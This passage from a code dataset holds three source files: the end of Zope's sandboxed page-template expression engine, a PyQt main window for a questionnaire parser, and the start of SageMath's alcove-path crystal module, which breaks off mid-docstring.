request=request)\n object = ProxyFactory(object)\n return object\n\nclass ZopePathExpr(PathExpr):\n\n def __init__(self, name, expr, engine):\n super(ZopePathExpr, self).__init__(name, expr, engine, zopeTraverser)\n\n\ndef trustedZopeTraverser(object, path_items, econtext):\n \"\"\"Traverses a sequence of names, first trying attributes then items.\n \"\"\"\n traverser = Traverser(object)\n return traverser.traverse(path_items,\n request=getattr(econtext, 'request', None))\n\nclass TrustedZopePathExpr(PathExpr):\n\n def __init__(self, name, expr, engine):\n super(TrustedZopePathExpr, self).__init__(name, expr, engine,\n trustedZopeTraverser)\n\n\n# Create a version of the restricted built-ins that uses a safe\n# version of getattr() that wraps values in security proxies where\n# appropriate:\n\n\nclass ZopePythonExpr(PythonExpr):\n\n def __call__(self, econtext):\n __traceback_info__ = self.text\n vars = self._bind_used_names(econtext, SafeBuiltins)\n return eval(self._code, vars)\n\n def _compile(self, text, filename):\n return rcompile.compile(text, filename, 'eval')\n\n\nclass ZopeContextBase(Context):\n \"\"\"Base class for both trusted and untrusted evaluation contexts.\"\"\"\n\n def evaluateText(self, expr):\n text = self.evaluate(expr)\n if text is self.getDefault() or text is None:\n return text\n if isinstance(text, basestring):\n # text could be a proxied/wrapped object\n return text\n return unicode(text)\n\n def evaluateMacro(self, expr):\n macro = Context.evaluateMacro(self, expr)\n return macro\n\n def translate(self, msgid, domain=None, mapping=None, default=None):\n return translate(msgid, domain, mapping,\n context=self.request, default=default)\n\n evaluateInlineCode = False\n\n def evaluateCode(self, lang, code):\n if not self.evaluateInlineCode:\n raise InlineCodeError(\n _('Inline Code Evaluation is deactivated, which means that '\n 'you cannot have inline code snippets in your Page '\n 'Template. Activate Inline Code Evaluation and try again.'))\n\n # TODO This is only needed when self.evaluateInlineCode is true,\n # so should only be needed for zope.app.pythonpage.\n from zope.app.interpreter.interfaces import IInterpreter\n interpreter = zapi.queryUtility(IInterpreter, lang)\n if interpreter is None:\n error = _('No interpreter named \"${lang_name}\" was found.',\n mapping={'lang_name': lang})\n raise InlineCodeError(error)\n\n globals = self.vars.copy()\n result = interpreter.evaluateRawCode(code, globals)\n # Add possibly new global variables.\n old_names = self.vars.keys()\n for name, value in globals.items():\n if name not in old_names:\n self.setGlobal(name, value)\n return result\n\n\nclass ZopeContext(ZopeContextBase):\n \"\"\"Evaluation context for untrusted programs.\"\"\"\n\n def setContext(self, name, value):\n # Hook to allow subclasses to do things like adding security proxies\n Context.setContext(self, name, ProxyFactory(value))\n\n\nclass TrustedZopeContext(ZopeContextBase):\n \"\"\"Evaluation context for trusted programs.\"\"\"\n\n\nclass AdapterNamespaces(object):\n \"\"\"Simulate tales function namespaces with adapter lookup.\n\n When we are asked for a namespace, we return an object that\n actually computes an adapter when called:\n\n To demonstrate this, we need to register an adapter:\n\n >>> from zope.app.testing.placelesssetup import setUp, tearDown\n >>> setUp()\n >>> from zope.app.testing import ztapi\n >>> def adapter1(ob):\n ... return 1\n >>> ztapi.provideAdapter(None, IPathAdapter, adapter1, 'a1')\n\n Now, with this adapter in place, we can try out the namespaces:\n\n >>> ob = object()\n >>> namespaces = AdapterNamespaces()\n >>> namespace = namespaces['a1']\n >>> namespace(ob)\n 1\n >>> namespace = namespaces['a2']\n >>> namespace(ob)\n Traceback (most recent call last):\n ...\n KeyError: 'a2'\n\n\n Cleanup:\n\n >>> tearDown()\n \"\"\"\n\n def __init__(self):\n self.namespaces = {}\n\n def __getitem__(self, name):\n namespace = self.namespaces.get(name)\n if namespace is None:\n def namespace(object):\n try:\n return zapi.getAdapter(object, IPathAdapter, name)\n except ComponentLookupError:\n raise KeyError(name)\n\n self.namespaces[name] = namespace\n return namespace\n\n\nclass ZopeEngine(ExpressionEngine):\n \"\"\"Untrusted expression engine.\n\n This engine does not allow modules to be imported; only modules\n already available may be accessed::\n\n >>> modname = 'zope.app.pagetemplate.tests.trusted'\n >>> engine = _Engine()\n >>> context = engine.getContext(engine.getBaseNames())\n\n >>> modname in sys.modules\n False\n >>> context.evaluate('modules/' + modname)\n Traceback (most recent call last):\n ...\n KeyError: 'zope.app.pagetemplate.tests.trusted'\n\n (The use of ``KeyError`` is an unfortunate implementation detail; I\n think this should be a ``TraversalError``.)\n\n Modules which have already been imported by trusted code are\n available, wrapped in security proxies::\n\n >>> m = context.evaluate('modules/sys')\n >>> m.__name__\n 'sys'\n >>> m._getframe\n Traceback (most recent call last):\n ...\n ForbiddenAttribute: ('_getframe', )\n\n The results of Python expressions evaluated by this engine are\n wrapped in security proxies::\n\n >>> r = context.evaluate('python: {12: object()}.values')\n >>> type(r)\n \n >>> r = context.evaluate('python: {12: object()}.values()[0].__class__')\n >>> type(r)\n \n\n General path expressions provide objects that are wrapped in\n security proxies as well::\n\n >>> from zope.app.container.sample import SampleContainer\n >>> from zope.app.testing.placelesssetup import setUp, tearDown\n >>> from zope.security.checker import NamesChecker, defineChecker\n\n >>> class Container(SampleContainer):\n ... implements(ITraversable)\n ... def traverse(self, name, further_path):\n ... return self[name]\n\n >>> setUp()\n >>> defineChecker(Container, NamesChecker(['traverse']))\n >>> d = engine.getBaseNames()\n >>> foo = Container()\n >>> foo.__name__ = 'foo'\n >>> d['foo'] = ProxyFactory(foo)\n >>> foo['bar'] = bar = Container()\n >>> bar.__name__ = 'bar'\n >>> bar.__parent__ = foo\n >>> bar['baz'] = baz = Container()\n >>> baz.__name__ = 'baz'\n >>> baz.__parent__ = bar\n >>> context = engine.getContext(d)\n\n >>> o1 = context.evaluate('foo/bar')\n >>> o1.__name__\n 'bar'\n >>> type(o1)\n \n\n >>> o2 = context.evaluate('foo/bar/baz')\n >>> o2.__name__\n 'baz'\n >>> type(o2)\n \n >>> o3 = o2.__parent__\n >>> type(o3)\n \n >>> o1 == o3\n True\n\n >>> o1 is o2\n False\n\n >>> tearDown()\n\n \"\"\"\n\n _create_context = ZopeContext\n\n def __init__(self):\n ExpressionEngine.__init__(self)\n self.namespaces = AdapterNamespaces()\n\n def getContext(self, __namespace=None, **namespace):\n if __namespace:\n if namespace:\n namespace.update(__namespace)\n else:\n namespace = __namespace\n\n context = self._create_context(self, namespace)\n\n # Put request into context so path traversal can find it\n if 'request' in namespace:\n context.request = namespace['request']\n\n # Put context into context so path traversal can find it\n if 'context' in namespace:\n context.context = namespace['context']\n\n return context\n\n\nclass TrustedZopeEngine(ZopeEngine):\n \"\"\"Trusted expression engine.\n\n This engine allows modules to be imported::\n\n >>> modname = 'zope.app.pagetemplate.tests.trusted'\n >>> engine = _TrustedEngine()\n >>> context = engine.getContext(engine.getBaseNames())\n\n >>> modname in sys.modules\n False\n >>> m = context.evaluate('modules/' + modname)\n >>> m.__name__ == modname\n True\n >>> modname in sys.modules\n True\n\n Since this is trusted code, we can look at whatever is in the\n module, not just __name__ or what's declared in a security\n assertion::\n\n >>> m.x\n 42\n\n Clean up after ourselves::\n\n >>> del sys.modules[modname]\n\n \"\"\"\n\n _create_context = TrustedZopeContext\n\n\nclass TraversableModuleImporter(SimpleModuleImporter):\n\n implements(ITraversable)\n\n def traverse(self, name, further_path):\n try:\n return self[name]\n except KeyError:\n raise TraversalError(name)\n\n\ndef _Engine(engine=None):\n if engine is None:\n engine = ZopeEngine()\n engine = _create_base_engine(engine, ZopePathExpr)\n engine.registerType('python', ZopePythonExpr)\n\n # Using a proxy around sys.modules allows page templates to use\n # modules for which security declarations have been made, but\n # disallows execution of any import-time code for modules, which\n # should not be allowed to happen during rendering.\n engine.registerBaseName('modules', ProxyFactory(sys.modules))\n\n return engine\n\ndef _TrustedEngine(engine=None):\n if engine is None:\n engine = TrustedZopeEngine()\n engine = _create_base_engine(engine, TrustedZopePathExpr)\n engine.registerType('python', PythonExpr)\n engine.registerBaseName('modules', TraversableModuleImporter())\n return engine\n\ndef _create_base_engine(engine, pathtype):\n for pt in pathtype._default_type_names:\n engine.registerType(pt, pathtype)\n engine.registerType('string', StringExpr)\n engine.registerType('not', NotExpr)\n engine.registerType('defer', DeferExpr)\n return engine\n\n\nEngine = _Engine()\nTrustedEngine = _TrustedEngine()\n\n\nclass AppPT(object):\n\n def pt_getEngine(self):\n return Engine\n\n\nclass TrustedAppPT(object):\n\n def pt_getEngine(self):\n return TrustedEngine\n","repo_name":"wpjunior/proled","sub_path":"Zope-2.9/lib/python/zope/app/pagetemplate/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":11875,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"14717763041","text":"\"\"\"\r\nThis file contains the main window for a Questionnaire Language (QL) parser GUI. The MainWindow contains an input_frame,\r\nwhich in turn contains a textbox for entering QL text, and a \"Parse\" button. When this button is pressed, the text is\r\nparsed and the encoded questionnaire is opened in an output_frame in the MainWindow. This questionnaire is interactive,\r\nand the entered answers may be saved to a .txt file by pressing the \"Submit\" button.\r\n\"\"\"\r\nfrom visitor.ql_visitor import visit_ql\r\nfrom visitor.qls_visitor import visit_qls\r\nfrom PyQt5 import QtWidgets, QtCore\r\nfrom antlr.parser import ParserInterface\r\nfrom gui.input_frame import InputFrame\r\nfrom gui.output_frame import OutputFrame\r\n\r\n\r\nclass MainWindow(QtWidgets.QWidget):\r\n def __init__(self):\r\n super(MainWindow, self).__init__()\r\n self.main_layout = QtWidgets.QHBoxLayout()\r\n self.main_layout.setSpacing(10)\r\n self.setLayout(self.main_layout)\r\n self.setWindowTitle('Questionnaire builder')\r\n self.setGeometry(200, 200, 1000, 500)\r\n\r\n # Initiates inner frames\r\n self.input_frame = InputFrame()\r\n self.output_frame = OutputFrame()\r\n self.main_layout.addWidget(self.input_frame, alignment=QtCore.Qt.AlignLeft)\r\n self.main_layout.addWidget(self.output_frame, alignment=QtCore.Qt.AlignRight)\r\n\r\n # Connect btn with parsing\r\n self.input_frame.parse_is_pressed.connect(self.parse)\r\n\r\n def parse(self, ql_text, qls_text):\r\n \"\"\" Parse the GUI user input \"\"\"\r\n if ql_text:\r\n # Init & traverse QL AST\r\n ql_data = ParserInterface(ql_text, 'QL')\r\n\r\n if ql_data.errors:\r\n return self.initiate_output_frame(errors=ql_data.errors)\r\n\r\n [question_ids, questions, error_message, warning_message] = visit_ql(ql_data.ast)\r\n\r\n if qls_text:\r\n # Init & traverses QLS AST\r\n qls_data = ParserInterface(qls_text, 'QLS')\r\n\r\n if qls_data.errors:\r\n return self.initiate_output_frame(errors=qls_data.errors)\r\n\r\n [question_ids, questions, error_message] = visit_qls(qls_data.ast, question_ids, questions)\r\n\r\n # The output_frame is initialized and appropriately filled with questions and their answering widgets.\r\n self.initiate_output_frame(question_ids, questions, warning_message, error_message)\r\n\r\n else:\r\n self.initiate_output_frame(errors=[\"Error: QL input missing\"])\r\n\r\n def initiate_output_frame(self, question_ids=list(), questions=None, warning=None, errors=None):\r\n \"\"\" Reinitialize output frame \"\"\"\r\n self.output_frame.setParent(None)\r\n self.output_frame.destroy()\r\n\r\n self.output_frame = OutputFrame(question_ids, questions, warning, errors)\r\n self.main_layout.addWidget(self.output_frame, alignment=QtCore.Qt.AlignRight)","repo_name":"software-engineering-amsterdam/endless-ql","sub_path":"Pythonistas/gui/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70150801080","text":"r\"\"\"\nAlcove paths\n\nAUTHORS:\n\n- Brant Jones (2008): initial version\n- Arthur Lubovsky (2013-03-07): rewritten to implement affine type\n- Travis Scrimshaw (2016-06-23): implemented `\\mathcal{B}(\\infty)`\n\nSpecial thanks to: Nicolas Borie, Anne Schilling, Travis Scrimshaw, and\nNicolas Thiéry.\n\"\"\"\n# ****************************************************************************\n# Copyright (C) 2008 Brant Jones \n# Copyright (C) 2013 Arthur Lubovsky \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 2 of the License, or\n# (at your option) any later version.\n# https://www.gnu.org/licenses/\n# ****************************************************************************\n\nfrom sage.structure.parent import Parent\nfrom sage.structure.element import Element\nfrom sage.structure.element_wrapper import ElementWrapper\nfrom sage.structure.unique_representation import UniqueRepresentation\nfrom sage.structure.richcmp import richcmp\nfrom sage.categories.classical_crystals import ClassicalCrystals\nfrom sage.categories.loop_crystals import LoopCrystals\nfrom sage.graphs.digraph import DiGraph\nfrom sage.combinat.root_system.cartan_type import CartanType\nfrom sage.combinat.root_system.root_system import RootSystem\nfrom sage.all import vector\nfrom sage.rings.integer import Integer\nfrom sage.combinat.root_system.weyl_group import WeylGroup\nfrom sage.misc.misc_c import prod\nfrom sage.categories.sets_cat import Sets\nfrom sage.misc.cachefunc import cached_method, cached_in_parent_method\nfrom sage.categories.highest_weight_crystals import HighestWeightCrystals\nfrom copy import copy\nfrom sage.misc.latex import latex\n\n\nclass CrystalOfAlcovePaths(UniqueRepresentation, Parent):\n r\"\"\"\n Crystal of alcove paths generated from a \"straight-line\" path to the\n negative of a given dominant weight.\n\n INPUT:\n\n - ``cartan_type`` -- Cartan type of a finite or affine untwisted root\n system.\n\n - ``weight`` -- Dominant weight as a list of (integral) coefficients of\n the fundamental weights.\n\n - ``highest_weight_crystal`` -- (Default: ``True``) If ``True``\n returns the highest weight crystal. If ``False`` returns an\n object which is close to being isomorphic to the tensor product\n of Kirillov-Reshetikhin crystals of column shape in the\n following sense: We get all the vertices, but only some of the\n edges. We'll call the included edges pseudo-Demazure. They are\n all non-zero edges and the 0-edges not at the end of a 0-string\n of edges, i.e. not those with `f_{0}(b) = b'` with\n `\\varphi_0(b) =1`. (Whereas Demazure 0-edges are those that\n are not at the beginning of a zero string.) In this case the\n weight `[c_1, c_2, \\ldots, c_k]` represents\n `\\sum_{i=1}^k c_i \\omega_i`.\n\n .. NOTE::\n\n If ``highest_weight_crystal`` = ``False``, since we do not\n get the full crystal, ``TestSuite`` will fail on the\n Stembridge axioms.\n\n .. SEEALSO::\n\n - :class:`Crystals`\n\n EXAMPLES:\n\n The following example appears in Figure 2 of [LP2008]_::\n\n sage: C = crystals.AlcovePaths(['G',2],[0,1])\n sage: G = C.digraph()\n sage: GG = DiGraph({\n ....: () : {(0) : 2 },\n ....: (0) : {(0,8) : 1 },\n ....: (0,1) : {(0,1,7) : 2 },\n ....: (0,1,2) : {(0,1,2,9) : 1 },\n ....: (0,1,2,3) : {(0,1,2,3,4) : 2 },\n ....: (0,1,2,6) : {(0,1,2,3) : 1 },\n ....: (0,1,2,9) : {(0,1,2,6) : 1 },\n ....: (0,1,7) : {(0,1,2) : 2 },\n ....: (0,1,7,9) : {(0,1,2,9) : 2 },\n ....: (0,5) : {(0,1) : 1, (0,5,7) : 2 },\n ....: (0,5,7) : {(0,5,7,9) : 1 },\n ....: (0,5,7,9) : {(0,1,7,9) : 1 },\n ....: (0,8) : {(0,5) : 1 },\n ....: })\n sage: G.is_isomorphic(GG)\n True\n sage: for (u,v,i) in G.edges(sort=True):\n ....: print((u.integer_sequence() , v.integer_sequence(), i))\n ([], [0], 2)\n ([0], [0, 8], 1)\n ([0, 1], [0, 1, 7], 2)\n ([0, 1, 2], [0, 1, 2, 9], 1)\n ([0, 1, 2, 3], [0, 1, 2, 3, 4], 2)\n ([0, 1, 2, 6], [0, 1, 2, 3], 1)\n ([0, 1, 2, 9], [0, 1, 2, 6], 1)\n ([0, 1, 7], [0, 1, 2], 2)\n ([0, 1, 7, 9], [0, 1, 2, 9], 2)\n ([0, 5], [0, 1], 1)\n ([0, 5], [0, 5, 7], 2)\n ([0, 5, 7], [0, 5, 7, 9], 1)\n ([0, 5, 7, 9], [0, 1, 7, 9], 1)\n ([0, 8], [0, 5], 1)\n\n Alcove path crystals are a discrete version of Littelmann paths.\n We verify that the alcove path crystal is isomorphic to the LS\n path crystal::\n\n sage: C1 = crystals.AlcovePaths(['C',3],[2,1,0])\n sage: g1 = C1.digraph() #long time\n sage: C2 = crystals.LSPaths(['C',3],[2,1,0])\n sage: g2 = C2.digraph() #long time\n sage: g1.is_isomorphic(g2, edge_labels=True) #long time\n True\n\n The preferred initialization method is via explicit weights rather than a Cartan type\n and the coefficients of the fundamental weights::\n\n sage: R = RootSystem(['C',3])\n sage: P = R.weight_lattice()\n sage: La = P.fundamental_weights()\n sage: C = crystals.AlcovePaths(2*La[1]+La[2]); C\n Highest weight crystal of alcove paths of type ['C', 3] and weight 2*Lambda[1] + Lambda[2]\n sage: C1==C\n True\n\n We now explain the data structure::\n\n sage: C = crystals.AlcovePaths(['A',2],[2,0]) ; C\n Highest weight crystal of alcove paths of type ['A', 2] and weight 2*Lambda[1]\n sage: C._R.lambda_chain()\n [(alpha[1], 0), (alpha[1] + alpha[2], 0), (alpha[1], 1), (alpha[1] + alpha[2], 1)]\n\n The previous list gives the initial \"straight line\" path from the\n fundamental alcove `A_o` to its translation `A_o - \\lambda` where\n `\\lambda = 2\\omega_1` in this example. The initial path for weight\n `\\lambda` is called the `\\lambda`-chain. This path is constructed from\n the ordered pairs `(\\beta, k)`, by crossing the hyperplane orthogonal to\n `\\beta` at height `-k`. We can view a plot of this path as follows::\n\n sage: x=C( () )\n sage: x.plot() # not tested - outputs a pdf\n\n An element of the crystal is given by a subset of the `\\lambda`-chain.\n This subset indicates the hyperplanes where the initial path should be\n folded. The highest weight element is given by the empty subset. ::\n\n sage: x\n ()\n sage: x.f(1).f(2)\n ((alpha[1], 1), (alpha[1] + alpha[2], 1))\n sage: x.f(1).f(2).integer_sequence()\n [2, 3]\n sage: C([2,3])\n ((alpha[1], 1), (alpha[1] + alpha[2], 1))\n sage: C([2,3]).is_admissible() #check if a valid vertex\n True\n sage: C([1,3]).is_admissible() #check if a valid vertex\n False\n\n Alcove path crystals now works in affine type (:trac:`14143`)::\n\n sage: C = crystals.AlcovePaths(['A',2,1],[1,0,0]) ; C\n Highest weight crystal of alcove paths of type ['A', 2, 1] and weight Lambda[0]\n sage: x=C( () )\n sage: x.f(0)\n ((alpha[0], 0),)\n sage: C.R\n Root system of type ['A', 2, 1]\n sage: C.weight\n Lambda[0]\n\n Test that the tensor products of Kirillov-Reshetikhin crystals\n minus non-pseudo-Demazure arrows is in bijection with alcove path\n construction::\n\n sage: K = crystals.KirillovReshetikhin(['B',3,1],2,1)\n sage: T = crystals.TensorProduct(K,K)\n sage: g = T.digraph() #long time\n sage: for e in g.edges(sort=False): #long time\n ....: if e[0].phi(0) == 1 and e[2] == 0: #long time\n ....: g.delete_edge(e) #long time\n\n sage: C = crystals.AlcovePaths(['B',3,1],[0,2,0], highest_weight_crystal=False)\n sage: g2 = C.digraph() #long time\n sage: g.is_isomorphic(g2, edge_labels = True) #long time\n True\n\n .. NOTE::\n\n In type `C_n^{(1)}`, the Kirillov-Reshetikhin crystal is not connected\n when restricted to pseudo-Demazure arrows, hence the previous example will\n fail for type `C_n^{(1)}` crystals.\n\n ::\n\n sage: R = RootSystem(['B',3])\n sage: P = R.weight_lattice()\n sage: La = P.fundamental_weights()\n sage: D = crystals.AlcovePaths(2*La[2], highest_weight_crystal=False)\n sage: C == D\n True\n\n .. WARNING:: Weights from finite root systems index non-highest weight crystals.\n \"\"\"\n\n @staticmethod\n def __classcall_private__(cls, starting_weight, cartan_type=None,\n highest_weight_crystal=None):\n \"\"\"\n Classcall to mend the input.\n\n Internally, the\n :class:`~sage.combinat.crystals.alcove_path.CrystalOfAlcovePaths`\n code works with a ``starting_weight`` that is in the weight space\n associated to the crystal. The user can, however, also input a\n ``cartan_type`` and the coefficients of the fundamental weights as\n ``starting_weight``. This code transforms the input into the right\n format (also necessary for :class:`UniqueRepresentation`).\n\n TESTS::\n\n sage: C = crystals.AlcovePaths(['A',2,1], [1,0,0])\n sage: C2 = crystals.AlcovePaths(CartanType(['A',2,1]), (1,0,0))\n sage: C is C2\n True\n sage: R = RootSystem(['B',2,1])\n sage: La = R.weight_space().basis()\n sage: B1 = crystals.AlcovePaths(['B',2,1],[0,0,1])\n sage: B2 = crystals.AlcovePaths(La[2])\n sage: B1 is B2\n True\n \"\"\"\n if isinstance(cartan_type, bool): # new style signature, optional arguments leak over\n highest_weight_crystal = cartan_type\n elif isinstance(cartan_type, (list, tuple)): # old style signature\n # switch positional arguments\n cartan_type, starting_weight = CartanType(starting_weight), cartan_type\n\n if highest_weight_crystal is False:\n if not cartan_type.is_affine():\n raise ValueError(\"non-highest weight crystals only valid for affine types\")\n cartan_type = cartan_type.classical()\n\n if cartan_type.is_affine():\n extended = True\n else:\n extended = False\n\n R = RootSystem(cartan_type)\n P = R.weight_space(extended=extended)\n Lambda = P.basis()\n offset = R.index_set()[Integer(0)]\n starting_weight = P.sum(starting_weight[j-offset]*Lambda[j] for j in R.index_set())\n\n #set defaults\n if highest_weight_crystal is None:\n highest_weight_crystal = True\n\n if not starting_weight.is_dominant():\n raise ValueError(\"{0} is not a dominant weight\".format(starting_weight))\n\n return super().__classcall__(cls, starting_weight,\n highest_weight_crystal)\n\n def __init__(self, starting_weight, highest_weight_crystal):\n r\"\"\"\n Initialize ``self``.\n\n TESTS::\n\n sage: C = crystals.AlcovePaths(['G',2],[0,1])\n sage: TestSuite(C).run()\n\n sage: C = crystals.AlcovePaths(['A',2,1],[1,0,0])\n sage: TestSuite(C).run() #long time\n\n sage: C = crystals.AlcovePaths(['A',2,1],[1,0],False)\n sage: TestSuite(C).run(skip=\"_test_stembridge_local_axioms\") #long time\n\n Check that :trac:`20292` is fixed::\n\n sage: A = crystals.AlcovePaths(['A',2], [1,0])\n sage: A.category()\n Category of classical crystals\n \"\"\"\n ##########################################################################\n # NOTE:\n # If cartan_type.is_affine() == True and highest weight crystal == False,\n # since we only use the positive roots of the *finite* root system\n # to get the crystal we set self._finite_cartan_type is true\n #\n # We want the indexing set to include 0 so use the affine type notation\n # for the Cartan type.\n ##########################################################################\n cartan_type = starting_weight.parent().cartan_type()\n\n self.weight = starting_weight\n self.R = RootSystem(cartan_type)\n self._highest_weight_crystal = highest_weight_crystal\n self._cartan_type = cartan_type\n\n if cartan_type.is_finite() and highest_weight_crystal:\n Parent.__init__(self, category=ClassicalCrystals())\n self._R = RootsWithHeight(starting_weight)\n self._finite_cartan_type = True\n elif cartan_type.is_finite() and not highest_weight_crystal:\n Parent.__init__(self, category=LoopCrystals().Finite())\n self._R = RootsWithHeight(starting_weight)\n self._finite_cartan_type = True\n self._cartan_type = cartan_type.affine()\n else:\n assert highest_weight_crystal\n Parent.__init__(self, category=HighestWeightCrystals())\n self._R = RootsWithHeight(starting_weight)\n self._finite_cartan_type = False\n\n self.module_generators = ( self.element_class(self, ()), )\n\n def _repr_(self):\n \"\"\"\n Return a string representation of ``self``.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2,1], [1,0,0])\n sage: C\n Highest weight crystal of alcove paths of type ['A', 2, 1] and weight Lambda[0]\n sage: C = crystals.AlcovePaths(['A',2,1], [1,0], False)\n sage: C\n Crystal of alcove paths of type ['A', 2, 1] and weight Lambda[1]\n \"\"\"\n if self._highest_weight_crystal:\n return \"Highest weight crystal of alcove paths of type %s and weight %s\" % (self._cartan_type, self.weight)\n return \"Crystal of alcove paths of type %s and weight %s\" % (self._cartan_type, self.weight)\n\n def _element_constructor_(self, data):\n \"\"\"\n Construct an element of ``self`` from ``data``.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2],[3,2])\n sage: C([8,9])\n ((alpha[1], 2), (alpha[1] + alpha[2], 4))\n \"\"\"\n if isinstance(data, tuple):\n return self.element_class(self, data)\n elif isinstance(data, list):\n lambda_chain = self._R.lambda_chain()\n #data starts indexing at 0\n return self.element_class(self, tuple(sorted([lambda_chain[i] for i in data])))\n\n def vertices(self):\n r\"\"\"\n Return a list of all the vertices of the crystal.\n\n The vertices are represented as lists of integers recording the folding\n positions.\n\n One can compute all vertices of the crystal by finding all the\n admissible subsets of the `\\lambda`-chain (see method\n is_admissible, for definition). We use the breadth first\n search algorithm.\n\n .. WARNING::\n\n This method is (currently) only useful for the case when\n ``highest_weight_crystal = False``, where you cannot always\n reach all vertices of the crystal using crystal operators,\n starting from the highest weight vertex. This method is\n typically slower than generating the crystal graph using\n crystal operators.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['C',2],[1,0])\n sage: C.vertices()\n [[], [0], [0, 1], [0, 1, 2]]\n sage: C = crystals.AlcovePaths(['C',2,1],[2,1],False)\n sage: len(C.vertices())\n 80\n\n The number of elements reachable using the crystal operators from the\n module generator::\n\n sage: len(list(C))\n 55\n \"\"\"\n lambda_chain = self._R.lambda_chain()\n len_lambda_chain = len(lambda_chain)\n W = WeylGroup(self._R._cartan_type, prefix='s')\n s = W.simple_reflections()\n highest_weight_crystal = self._highest_weight_crystal\n\n if highest_weight_crystal:\n successors = 'bruhat_upper_covers'\n else:\n successors = 'quantum_bruhat_successors'\n\n # lst contains ordered pairs (w,l) l= list of positions that get\n # you to the word, it needs to be refreshed\n\n #initialization\n lst=[]\n for i in range(len_lambda_chain):\n associated_reflection = lambda_chain[i].root.associated_reflection()\n if len(associated_reflection) == 1:\n lst.append( (prod([ s[j] for j in associated_reflection ]), [i]) )\n\n l=copy(lst)\n\n while True:\n lst2 = []\n for x in lst:\n suc = getattr(x[0], successors)()\n for j in range(x[1][-1]+1, len_lambda_chain):\n temp = x[0] * prod(\n [ s[k] for k in lambda_chain[j].root.associated_reflection() ])\n if temp in suc:\n lst2.append((temp,x[1]+[j]))\n l.append((temp,x[1]+[j]))\n if lst2 == []:\n break\n else:\n lst = lst2\n\n return [ [] ] + [i[1] for i in l]\n\n\nclass CrystalOfAlcovePathsElement(ElementWrapper):\n \"\"\"\n Crystal of alcove paths element.\n\n INPUT:\n\n - ``data`` -- a list of folding positions in the lambda chain (indexing\n starts at 0) or a tuple of :class:`RootsWithHeight` giving folding\n positions in the lambda chain.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2],[3,2])\n sage: x = C ( () )\n sage: x.f(1).f(2)\n ((alpha[1], 2), (alpha[1] + alpha[2], 4))\n sage: x.f(1).f(2).integer_sequence()\n [8, 9]\n sage: C([8,9])\n ((alpha[1], 2), (alpha[1] + alpha[2], 4))\n \"\"\"\n\n def __iter__(self):\n r\"\"\"\n Initialize ``self``.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2],[1,0])\n sage: lst = list(C)\n sage: for i in lst[2]: i\n (alpha[1], 0)\n (alpha[1] + alpha[2], 0)\n \"\"\"\n return iter(self.value)\n\n def is_admissible(self):\n r\"\"\"\n Diagnostic test to check if ``self`` is a valid element of the crystal.\n\n If ``self.value`` is given by\n\n .. MATH::\n\n (\\beta_1, i_1), (\\beta_2, i_2), \\ldots, (\\beta_k, i_k),\n\n for highest weight crystals this checks if the sequence\n\n .. MATH::\n\n 1 \\rightarrow s_{\\beta_1} \\rightarrow\n s_{\\beta_1}s_{\\beta_2} \\rightarrow \\cdots \\rightarrow\n s_{\\beta_1}s_{\\beta_2} \\ldots s_{\\beta_k}\n\n is a path in the Bruhat graph. If ``highest_weight_crystal=False``,\n then the method checks if the above sequence is a path in the quantum\n Bruhat graph.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2],[1,1]); C\n Highest weight crystal of alcove paths of type ['A', 2] and weight Lambda[1] + Lambda[2]\n sage: roots = sorted(C._R._root_lattice.positive_roots()); roots\n [alpha[1], alpha[1] + alpha[2], alpha[2]]\n sage: r1 = C._R(roots[0],0); r1\n (alpha[1], 0)\n sage: r2 = C._R(roots[2],0); r2\n (alpha[2], 0)\n sage: r3 = C._R(roots[1],1); r3\n (alpha[1] + alpha[2], 1)\n sage: x = C( ( r1,r2) )\n sage: x.is_admissible()\n True\n sage: x = C( (r3,) ); x\n ((alpha[1] + alpha[2], 1),)\n sage: x.is_admissible()\n False\n sage: C = crystals.AlcovePaths(['C',2,1],[2,1],False)\n sage: C([7,8]).is_admissible()\n True\n sage: C = crystals.AlcovePaths(['A',2],[3,2])\n sage: C([2,3]).is_admissible()\n True\n\n .. TODO:: Better doctest\n \"\"\"\n W = WeylGroup(self.parent()._R._cartan_type, prefix='s')\n s = W.simple_reflections()\n highest_weight_crystal = self.parent()._highest_weight_crystal\n\n if highest_weight_crystal:\n successors = 'bruhat_upper_covers'\n else:\n successors = 'quantum_bruhat_successors'\n\n # start at the identity\n w = W.one()\n for i in self:\n t = prod([s[j] for j in i.root.associated_reflection()])\n successor = w * t\n if successor not in getattr(w, successors)():\n return False\n w = successor\n return True\n\n def _latex_(self):\n r\"\"\"\n Return a `\\LaTeX` representation of ``self``.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2],[1,1])\n sage: C([1,2])._latex_()\n [(\\alpha_{1} + \\alpha_{2}, 0), (\\alpha_{1}, 0)]\n \"\"\"\n return [(latex(i.root), i.height) for i in self.value]\n\n @cached_in_parent_method\n def integer_sequence(self):\n r\"\"\"\n Return a list of integers corresponding to positions in\n the `\\lambda`-chain where it is folded.\n\n .. TODO::\n\n Incorporate this method into the ``_repr_`` for finite Cartan type.\n\n .. NOTE::\n\n Only works for finite Cartan types and indexing starts at 0.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2],[3,2])\n sage: x = C( () )\n sage: x.f(1).f(2).integer_sequence()\n [8, 9]\n \"\"\"\n lambda_chain = self.parent()._R.lambda_chain()\n return [lambda_chain.index(j) for j in self.value]\n\n def phi(self, i):\n r\"\"\"\n Return the distance to the end of the `i`-string.\n\n This method overrides the generic implementation in the category of\n crystals since this computation is more efficient.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2],[1,1])\n sage: [c.phi(1) for c in C]\n [1, 0, 0, 1, 0, 2, 1, 0]\n sage: [c.phi(2) for c in C]\n 